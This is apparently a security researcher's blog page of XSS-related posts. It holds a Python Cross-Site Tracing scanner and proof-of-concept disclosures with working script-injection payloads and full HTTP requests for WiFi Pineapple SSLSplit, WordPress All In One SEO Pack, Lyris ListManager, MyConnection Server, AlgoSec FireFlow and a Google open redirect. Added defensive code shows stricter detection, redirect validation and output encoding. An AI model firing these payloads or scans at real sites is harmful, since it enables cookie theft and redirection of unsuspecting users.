Showing posts with label xss. Show all posts

Saturday, February 28, 2015

Cross-Site Tracer Exploit


#!/usr/bin/env python3
# Cross-Site Tracer by 1N3 v20150224
# https://crowdshield.com
#
# ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing.
# For more robust mass scanning, you can create a list of domains or IP addresses to
# iterate through by doing 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;'
#
# USAGE: xsstracer.py <IP/host> <port>
#

import socket
import sys


class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


def main(argv):
    argc = len(argv)

    # Need the script name, a host and a port; otherwise print the banner and usage.
    if argc <= 2:
        print(bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC)
        print(bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC)
        print(bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC)
        sys.exit(0)

    target = argv[1]  # SET TARGET
    port = argv[2]    # SET PORT

    # Minimal TRACE request. The "Test" header carries a marker that a server with
    # TRACE enabled echoes back in the response body.
    buffer1 = "TRACE / HTTP/1.1"
    buffer2 = "Test: <script>alert(1);</script>"
    buffer3 = "Host: " + target

    print("")
    print(bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 " + bcolors.ENDC)
    print(bcolors.OKBLUE + "+ -- --=[https://crowdshield.com" + bcolors.ENDC)
    print(bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + port + bcolors.ENDC)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)  # do not hang forever on a silent host
    result = s.connect_ex((target, int(port)))

    if result == 0:
        # HTTP header lines end in CRLF and an empty line terminates the request.
        request = buffer1 + "\r\n" + buffer2 + "\r\n" + buffer3 + "\r\n\r\n"
        s.sendall(request.encode("ascii"))
        try:
            data = s.recv(1024).decode("latin-1")
        except socket.timeout:
            data = ""
        script = "alert"
        if script.lower() in data.lower():
            print(bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" + bcolors.ENDC)
            print("")
            print(bcolors.WARNING + data + bcolors.ENDC)
        else:
            print(bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!" + bcolors.ENDC)
            print("")
    else:
        print(bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC)

    s.close()


if __name__ == "__main__":
    main(sys.argv)
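The script above flags a host as soon as the string "alert" appears anywhere in the reply, which a 405 error page that quotes the rejected request can also satisfy. The following is an added example (not part of the original script) of a stricter check: it parses the raw reply and only reports XST when the status is 200, the body is `message/http`, and the complete marker header is echoed back. The two responses are constructed samples, not captures from a real server.

```python
import re

# Constructed sample replies (not captured from a real host).
VULNERABLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: message/http\r\n"
    "\r\n"
    "TRACE / HTTP/1.1\r\n"
    "Test: <script>alert(1);</script>\r\n"
    "Host: example.test\r\n"
)
SAFE_RESPONSE = (
    "HTTP/1.1 405 Method Not Allowed\r\n"
    "Allow: GET, HEAD, POST\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<p>The requested method TRACE is not allowed. Tried: alert(1)</p>\r\n"
)


def split_response(raw):
    """Return (status_code, headers_dict, body) for a raw HTTP/1.x reply."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    m = re.match(r"HTTP/\d\.\d (\d{3})", lines[0])
    status = int(m.group(1)) if m else 0
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def trace_reflected(raw, marker="Test: <script>alert(1);</script>"):
    """True only when TRACE is really enabled: a 200 reply whose message/http
    body echoes the whole marker header we sent."""
    status, headers, body = split_response(raw)
    if status != 200:
        return False
    if not headers.get("content-type", "").startswith("message/http"):
        return False
    return marker in body


def naive_check(raw):
    """The substring test the script uses; kept to show the false positive."""
    return "alert" in raw.lower()
```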

Tuesday, December 30, 2014

WiFi Pineapple MK5 / SSLSplit v1.1 Cross-Site Scripting (Stored)

Vendor: Hak5
Website: http://www.hak5.com
Hardware: Wifi Pineapple MK5
Software: SSLSplit
Version: 1.1
Author: 1N3

I'm releasing this info purely for educational purposes. There appears to be a stored Cross-Site Scripting vulnerability in the SSLSplit v1.1 infusion for the Pineapple MK5. A rogue WiFi user could use it to trigger Cross-Site Scripting against the owner of the Pineapple device when the owner views the SSLSplit logs.

Reproduction Steps:
1. Attacker sets up a RogueAP using PineappleV with SSLSplit running
2. A WiFi user connects to the PineappleV RogueAP
3. The WiFi user then creates an image on their web server with the following string embedded in its meta tags: "></script>">'><img src=x onerror=confirm(4)>
4. The WiFi user opens a web browser and navigates to the affected image they just created
5. Attacker then tries to download the logs via the SSLSplit web UI (SSLSplit > History > Click "Download" for the affected log file)

Result:
An alert window is displayed to the attacker (the Pineapple owner)




Friday, November 28, 2014

Google Captcha Open Redirect



Google's captcha page has an open redirect because it does not verify that the "continue" parameter in the URI points to a Google domain, or even to the referring domain. Google's bug bounty rules, however, state:

"URL redirection. We recognize that the address bar is the only reliable security indicator in modern browsers; consequently, we hold that the usability and security benefits of a small number of well-designed and closely monitored redirectors outweigh their true risks".

So, I'm publicly disclosing this as a POC for research/educational purposes...

Affected URL:
https://ipv4.google.com/sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com/search

GET /sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com%2Fsearch&id=14323360019737732799&captcha=phaures&submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://ipv4.google.com/sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com/search
Cookie: NID=67=IJICmq9eG5l0yY71_TfQozLw8DqSRnymUmwzff1ftXnOJUKR1DmQ6oNiVUHutjOq8gSK-U5pHi96fgeEcjj7PX_tzBD5A_mOXE5wgZFddOC1p7gpn6gh7OfKbY8yASBSdChbMBpd2599HQqixF_yQZJJ3YGLPE0ojZGWkkX-ArdVUC_-pN9koTIoKx9eE0YY8SXE6GjnCnhvQYfEQuDW-Uxe; SID=DQAAAOkAAABhw0WvrjkT8xQH6c2XgaLv0p-tL5jZLgztm7PS4qjUKRW5A82hfRjqWIfUtygXtsOMVn79HsfuJlvygQihmq_jLIiKcVBSD6sP_j1zjQ70SJXlu_CwJS8BbCB6qte5owth0Woh9QYpQwlb3oGiIO14jzMO3J2bB3igtHuM9zw_FeeuV-45KLypZVSQ3vRgi1ql3CwCaGwdDOWsKX6sXYupSTWuwJGXlDoUbRelbGbNbj5lFk8zjH7i_OpSHtoObNSxcez8XKDdGGCXBunuxjmR5AJFPfOZAtuxUyNvepJNdtl85w9dp2rBmNK0vdy36Bg; HSID=An9s7nZT7S1d_V9NH; SSID=A5E1or_MNlR1bvfU0; APISID=NYY4lJPJNBtsj_OP/A93qTAJ9-5f1twNHn; SAPISID=yMRvPFxee5Yw48l7/A7k5Ks0Cjoi06jpEW; PREF=ID=062dffbad71fd850:U=741c8f032b07f996:FF=0:LD=en:TM=1415471152:LM=1415472410:GM=1:S=SJROGFDVcQgxz3Bj; GOOGLE_ABUSE_EXEMPTION=ID=b1036b53551499da:TM=1417137339:C=c:IP=37.221.161.234-:S=APGng0sgdi6BVBm7QOwlNSTnlE3Uvcupow
Connection: keep-alive
Host: ipv4.google.com

GET /search?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Db1036b53551499da:TM%3D1417137339:C%3Dc:IP%3D37.221.161.234-:S%3DAPGng0v_nA-tCWgqXfxnch6lFhMcnFuAeg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DFri,+28-Nov-2014+04:15:39+GMT HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: __unam=7639673-1499c44efc6-201377d0-26; _ga=GA1.2.1993885406.1416758620; PHPSESSID=kph66vkf5on6879ivj7paml4o4
Connection: keep-alive
Host: www.xerosecurity.com
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Fri, 28 Nov 2014 01:08:32 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Fri, 28 Nov 2014 00:39:03 GMT
ETag: "e40dbf-47-508e07cd2d95b"
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<html>
<head></head>
<body>
<script>alert(1);</script>
</body>
</html>
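The fix for this class of bug is to validate the "continue" value before redirecting to it. The following is an added example (not Google's code) of an allow-list check written in Python: it accepts only site-relative paths or absolute http(s) URLs whose host is on an assumed allow-list, and rejects the scheme-relative, backslash and userinfo forms that commonly slip past naive prefix checks. The host names in `ALLOWED_HOSTS` are assumptions for the example.

```python
from urllib.parse import urlsplit

# Hosts a "continue" value may point to (assumed allow-list for this example).
ALLOWED_HOSTS = {"www.google.com", "ipv4.google.com"}


def safe_continue(value, default="/"):
    """Return `value` if it is a site-relative path or an absolute http(s) URL
    on an allowed host; otherwise return `default`."""
    if not value:
        return default
    # Browsers treat a backslash like a slash, so "/\evil.test" is "//evil.test".
    value = value.replace("\\", "/")
    parts = urlsplit(value)
    if parts.netloc:
        # Absolute or scheme-relative URL: scheme and host must both be allowed.
        # urlsplit().hostname strips any user:pass@ prefix, so
        # "https://www.google.com@evil.test/" is judged by "evil.test".
        if parts.scheme not in ("http", "https"):
            return default
        if (parts.hostname or "").lower() not in ALLOWED_HOSTS:
            return default
        return value
    if parts.scheme:
        # "javascript:", "data:" and similar have no authority part at all.
        return default
    if not parts.path.startswith("/"):
        return default
    return value
```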





Wednesday, August 13, 2014

All In One SEO Pack v.2.2.2 Stored XSS



Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2

ABOUT:

All in One SEO Pack is a WordPress SEO plugin that automatically optimizes a WordPress blog for search engines such as Google. Version 2.2.2 suffers from a cross-site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. A malicious author or admin of a site could use this flaw to secretly redirect users of the site to a malicious site or to steal the session cookies of other users.


NOTE: The user must have the ability to publish pages in the affected WordPress site (usually the Author or Administrator role).

POC:
http://localhost/wordpress/wp-admin/post.php?post_type=page

Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/wordpress/wp-admin/post-new.php?post_type=page
Cookie=wp-saving-post-107=check; wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C5eb50362019f43eae995f2e48c5227f4; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1407939753; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C0a5ac5bc9c15db1b47d703678928b5be; PHPSESSID=oibbnvob8bp761ep58hlijji23; bp-activity-oldestpage=1
Content-Type=application/x-www-form-urlencoded
Content-Length=1856

POSTDATA=_wpnonce=6da01af260&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=page&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&auto_draft=&post_ID=107&meta-box-order-nonce=a33dd2a867&closedpostboxesnonce=e5ec4ba0bf&post_title=XSS2&samplepermalinknonce=12c1ea009d&content=XSS2&mobile_template_box_nonce=704c3cc317&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&wptouch_mobile_page_template=Default+Template&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=08&jj=13&aa=2014&hh=10&mn=29&ss=11&hidden_mm=08&cur_mm=08&hidden_jj=13&cur_jj=13&hidden_aa=2014&cur_aa=2014&hidden_hh=10&cur_hh=10&hidden_mn=29&cur_mn=29&original_publish=Publish&publish=Publish&parent_id=&page_template=default&menu_order=0&yoast_wpseo_focuskw=&yoast_wpseo_title=&yoast_wpseo_metadesc=&yoast_wpseo_meta-robots-noindex=0&yoast_wpseo_sitemap-include=-&yoast_wpseo_sitemap-prio=-&yoast_wpseo_sitemap-html-include=-&yoast_wpseo_authorship=-&yoast_wpseo_canonical=&yoast_wpseo_redirect=&yoast_wpseo_opengraph-description=&yoast_wpseo_opengraph-image=&yoast_wpseo_google-plus-description=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=85af917bd6&advanced_view=1&comment_status=open&ping_status=open&post_name=&post_author_override=1&aiosp_edit=aiosp_edit&nonce-aioseop-edit=d33cea6040&aiosp_title=&length1=0&aiosp_description=&length2=0&aiosp_keywords=&aiosp_titleatr=&aiosp_menulabel=%3Cscript%3Ealert%288%29%3B%3C%2Fscript%3E

Thursday, July 31, 2014

Lyris ListManagerWeb 8.95a Reflective XSS

Author: 1N3
Website: http://xerosecurity.com
Vendor Website: http://lyris.com/us-en/products/listmanager
Affected Product: Lyris ListManagerWeb
Affected Version: 8.95a

ABOUT:
Lyris ListManager (Lyris LM) is on-premises email marketing software for companies that need to run high-volume email programs behind a firewall. Version 8.95a suffers from a cross-site scripting (XSS) vulnerability in the “doemailpassword.tml” page because it fails to properly sanitize the “EmailAddr” POST variable.

POC:
POST http://host.com/doemailpassword.tml HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://host.com/emailpassword.tml
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Proxy-Connection: Keep-Alive
Host: host.com

EmailAddr=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E

Monday, July 21, 2014

MyConnection Server (MCS) Reflective XSS



Author: 1N3
Website: http://treadstonesecurity.blogspot.ca
Vendor Website: http://www.visualware.com/
Affected Product: MyConnection Server
Affected Version: 9.7i (others may also be vulnerable)

ABOUT:
MyConnection Server (MCS) delivers a broad range of supported, managed, automated and user-initiated self-help connection testing and monitoring services directly via the browser to any online customer or location. Due to a failure to sanitize certain GET variables passed to the connection test page (usually test.php), it is possible to inject client-side JavaScript that runs in the context of the user browsing the website. Several parameters, including testtype, ver, cm, map, lines, duration and others, appear to be vulnerable.


POC:
http://scrubbedhost.com/test.php?testtype=1"><script>alert(1);</script>&codebase=myspeed.pathcom.com&location=Canada:%20Toronto,%20ON&ver=1"><script>alert(1);</script>&cm=1"><script>alert(1);</script>&map=1"><script>alert(1);</script>&lines=1"><script>alert(1);</script>&pps=1"><script>alert(1);</script>&bpp=1"><script>alert(1);</script>&codec=1"><script>alert(1);</script>&provtext=1"><script>alert(1);</script>&provtextextra=11"><script>alert(1);</script>&provlink=1"><script>alert(1);</script>


VULNERABLE CODE:

* Both voiplines and testlength are written into the page without being properly sanitized, so they are vulnerable to reflective XSS.

<td valign="top" width="30%"><b>Current
    Settings</b>
          <br>
          <br>
          <b>VoIP Lines Simulated</b>:
          <script type="text/javascript"> document.write(voiplines); </script><br>
          <b>Test Length</b>:
          <script type="text/javascript"> document.write(testlength); </script><br>
          <b>Codec</b>:
          <script type="text/javascript"> if (codec == "g711") { document.write(nameg711); }
    else { document.write(nameg729); }
          </script><br>
          </td>
          <td align="left" width="70%">
          <p align="center">
<script>
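
The Lyris report and the MCS report above are the same mistake in two output contexts: EmailAddr lands in HTML text (so "</td><script>" closes the cell and opens a script), while the MCS parameters land inside a JavaScript string that is later written into the page with document.write (so 1"><script> closes the literal). The following is an added example, not code from either vendor, showing the encoding each context needs in Python; the payloads are constructed from the two POCs and the function names are the example's own.

```python
import html
import json

# Constructed payloads modelled on the two reports above.
EMAILADDR_PAYLOAD = "</td><script>alert(1);</script><td>"   # Lyris: HTML text context
LINES_PAYLOAD = '1"><script>alert(1);</script>'             # MCS: JavaScript string context


def html_text(value):
    """Encode for HTML element content or a quoted attribute value."""
    return html.escape(value, quote=True)


def js_string_literal(value):
    """Encode for a JavaScript string literal inside a <script> block.
    json.dumps escapes quotes and backslashes but leaves '<' alone, so a
    value containing '</script>' would still terminate the block; escaping
    the angle brackets as \\u003c / \\u003e closes that hole."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def settings_row(label, value):
    """Server-side rendering of one 'Current Settings' line with the value in
    HTML text context. This replaces document.write(voiplines): even a
    correctly encoded JS literal is unsafe once document.write() re-parses
    it as HTML, so the value is never handed to script at all."""
    return f"<b>{html_text(label)}</b>: {html_text(value)}<br>"


def settings_script(lines, testlength):
    """If the values must still reach client-side script, emit them as
    encoded literals; the page must then insert them via textContent,
    never document.write or innerHTML."""
    return (
        "<script>"
        f"var voiplines = {js_string_literal(lines)};"
        f"var testlength = {js_string_literal(testlength)};"
        "</script>"
    )
```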


Monday, June 9, 2014

AlgoSec FireFlow v6.3 XSS/HTML Injection Flaws


x---==== Exploit Title: AlgoSec FireFlow v6.3 XSS/HTML Injection Flaws
x---==== Date: Mon Jun 9 2014
x---==== Author: 1N3
x---==== Homepage: http://treadstonesecurity.blogspot.ca
x---==== Software Link: http://www.algosec.com/en/products_solutions/products/fireflow
x---==== Version: 6.3 (Other versions may also be susceptible)

x---==== Vulnerability
Form fields in the user preferences screen in AlgoSec FireFlow v6.3-b230 are vulnerable to reflective XSS and HTML injection attacks. This may allow attackers to execute arbitrary JavaScript on behalf of other logged-in users of the system by placing XSS code in their signature.

x---==== Vulnerable URL:
https://fireflowhostname.com/FireFlow/SelfService/Prefs.html

x---==== XSS Code:
<script>alert(document.cookie)</script>